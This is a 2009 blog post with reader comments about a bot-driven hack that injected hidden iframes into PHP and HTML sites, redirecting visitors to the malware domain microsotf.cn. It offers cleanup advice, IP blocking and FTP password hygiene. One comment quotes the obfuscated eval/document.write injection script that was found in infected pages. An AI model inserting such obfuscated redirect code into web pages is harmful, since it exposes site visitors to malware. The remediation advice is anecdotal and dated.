So I emerged from a fantastic vacation weekend to find all of my php sites not working. Each displaying the same simple error message:
“Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ‘,’ or ‘;’”
After my initial 30 second panic attack subsided I did a little googling and came up with this site: http://www.geeked.info/web-site-hack-loading-microsotfcn/
I’m assuming this is a bot that crawls from site to site. I had websites hacked across three different servers.
Once hacked, the site should produce a tiny iFrame that redirects to microsotf.cn. Don’t visit the page. It will most certainly ruin your day – spyware, malware, whatever. The beauty is – wordpress sites don’t display the iFrame. They just wind up broken. Other sites however won’t appear very different at all and it will be nearly impossible to tell whether the site was hacked or not.
If you’re having this problem simply open the source of the page in question and look a block of code similar to this (either immediately following the body tag or at the very bottom of the source code.):
Delete the offending code – upload (backup the original first, just in case) and you’re back in business.
Thanks to Ed over at http://www.geeked.info/ for having the ONLY blog post I could find on the whole internet about the hack.
EDIT: 7/9/09 – It has happened again to one of my sites. Different block of code, different malware site being loaded – same basic poison/remedy. For those interested in learning how to block an ip address (or range of ip addresses) – click here.
Happened to me too. Thanks for posting this.
Happened to us also, 3 times!!!
We don’t know how they keep doing it either!!!
i did that – was ok for a week – now again been attacked by it … changed my FTP passwords and everything – how do u prevent this thing from attacking?
Contact your server administrator (in my case my shared hosting companies) and let them know what’s going on. If they’re even remotely worth doing business with they will investigate and block the offending ip address (91.212.198.37 ) or better yet, the entire range: 91.212.*.*
My host is awesome – Glitterhost – servers are some of the fastest in the US. The owner of the company returns phone calls personally, and they blocked that ip address for me within hours of my contacting them.
Cool – contacted host and advised them – thanks heaps for the I.P range was a great help … lets hope my host are as helpful.
Cheers
http://rockymountainenvironmental.com/
07/04/09 — 8:16am
Altered files: index.htm, index.html, default.asp, main.html
Offending Code: document.write(“‘);document.write(“‘);document.write(“”);
The Script failed to redirect due to conflict between my script call and my arguments. Repaired files 07/06/09 after discovery.
07/09/09 — 6:11AM
NEW OFFENDING CODE
eval(“d((*)&!o$^!%c$[[^@&um((*)&!e$[[^@&n[@&%^t.w$[[^@&r((*)&!i((*)&!t$^!%e(&@)&](‘(&@)&]‘$^!%)$[[^@&;[@&%^".replace(/\(\&\@\)\&\]|\$\^\!\%|\(\(\*\)\&\!|\$\[\[\^\@\&|\[\@\&\%\^/ig, ""))
This redirect bypassed my script calls and proceeded to download malware.
Malware: [braviax (fakealeart Trojan)]& [ID12 Undetermined self replicating virus]
I have closed down any server-side includes that are not necessary, changed passwords, and contacted Web.com to block IP as I as a client don’t have access or admin rights to .htaccess. Best of luck to all.
(Allen)
Happened to me too – 5 sites taken out. For the second time. If you don’t mind, what host are you using? I’m using 1and1.com. I’m wondering if there’s a commonality amongst us.
It’s been suggested from other sites in my research that they may be using your own ftp software by stealing your saved usernames and passwords. Not sure if that’s how they’re getting in to our servers so easy but it couldn’t hurt to save them in a separate encrypted file. Some also say that it doesn’t matter if you save them with the ftp client or not since they’ll grab them once you try and connect to your server and that the only safe way to transfer files is SSH.
I read about the ftp passwords. I don’t find that too hard to believe, but last night my Bludomain site was hacked again and I had THEM change my password the last time it happened, so I don’t think FTP passwords are the only way in.
I’ve contacted all my Web clients and told them to reset their passwords. And I reset my password as well. I took out all passwords in Filezilla. Is there anything else to do to stop this? I’m running AVG and Malwarebytes and so far that hasn’t stopped microsotf.cn. This is so stressful.
Here’s what I got from the abuse team at one of my hosts:
As for your computer – download Avast. It should catch the trojan that avg and malware bytes is letting slip through. Also make sure EVERY file on your server named “index”, “home” and “login” are cleaned up.
Awesome. I will try your suggestions and will download Avast. Thanks much.
Ok, about 8 of my websites were hit by this microsotf.cn iFrame script. And here’s the really troubling part: the code was inserted not just into index.php files, but also into TEMPLATE files located in a separate directory. Could be because the affected template files are called main.html, so some automated process thought it was an index equivalent, but much more lamely it could mean that there is live (human) intervention into the code-installation process.
I fixed all of the files, reset my ftp password, and have had two of my sites re-hacked since then.
This is the first I’ve heard about the possibility of FTP password files being compromised by malware or what-have-you, so I will try deleting all those saved passwords, resetting passwords on the server side (again), and maybe even switching ftp clients (right now I use Filezilla).
Just out of curiosity, WHO HERE IS USING FILEZILLA AND HAS BEEN HACKED? Raise your hand!
*Raises hand*
There’s gotta be some pattern.
-Phil
Phil. Before you do any of that you need to scan your system for malware. AVG (corporate edition) couldn’t spot it but Avast did. It’s a free download and even warns me when I DL an infected file off my ftp site. Rid your PC of any potential viruses/trojans/malware – then clean all the possibly infected files on your ftp site. THEN change all your ftp passwords. I *think* I’ve gotten my sites safely out of harm’s way (knock on wood).
I am using Filezilla and just for good measure – it no longer remembers passwords.
Thanks for the tips Matt, keep us posted as to whether your current fix-level proves sufficient. I’ll do the same once I am done sweeping my pcu with Avast and reinstalling some things.
-Phil
My site has had this issue several tiems over the last few weeks. No mysql on the server so I am sure its an FTP attack. My webhost (ixwebhosting)does not offer ssh, I pointed out several others to them that do & said I’m moving unless they do likewise soon. In my case I think the problem came from the person maintianign the spanish section of my site who is using firezilla. I found this link http://www.tech-evangelist.com/2009/06/08/filezilla-alert-trojan-virus/ . I use WSFTP professional which has the ability to search the remote files by date, so when I get hacked I search for those changed in the last 24 hours & it picks them out nicely. It is always the same 5 or 6 pages out of what is a large site. For that reason i suspect they have installed a file somewhere to do the hack that they are executing within my own site. i am currently searching the whole site manually for it if it exists.
Has anyone tried Hack Detect Pro? It sonly $20 and apperently will detect any files changed and replace them with a backup. For that price its worth the chance.
Actually as a follow up, when I asked my host for the Ftp logs they said they just implemented a new security feature. You upload 2 files to your server root directory, http://ftp.allow & http://ftp.deny. This way you can block any IP except your own from access. If you change IP’s you would have to do a file transfer in your control panel as you would be blocked yourself. This is a great simple solution. It may be worth cosnidering a host change for some. This is ixwebhosting.
http://ftp.allow eg
ALL: 207.216.239.69
ftp:deny eg
All:All
[...] to some good discussions about this iframe hack: Web site hack loading microsotf.cn | Geeked Info Website hack – microsotf.cn – Wordpress | Web Design, Raleigh NC – Matt Swanner Here is an older article/blog post, it does not mention these new .cn domains, but still good [...]
What a really cool blog!
Actually as a follow up, when I asked my host for the Ftp logs they said they just implemented a new security feature. You upload 2 files to your server root directory, http://ftp.allow & http://ftp.deny. This way you can block any IP except your own from access. If you change IP’s you would have to do a file transfer in your control panel as you would be blocked yourself. This is a great simple solution. It may be worth considering a host change for some.
http://ftp.allow eg
ALL: 207.216.239.69
ftp:deny eg
All:All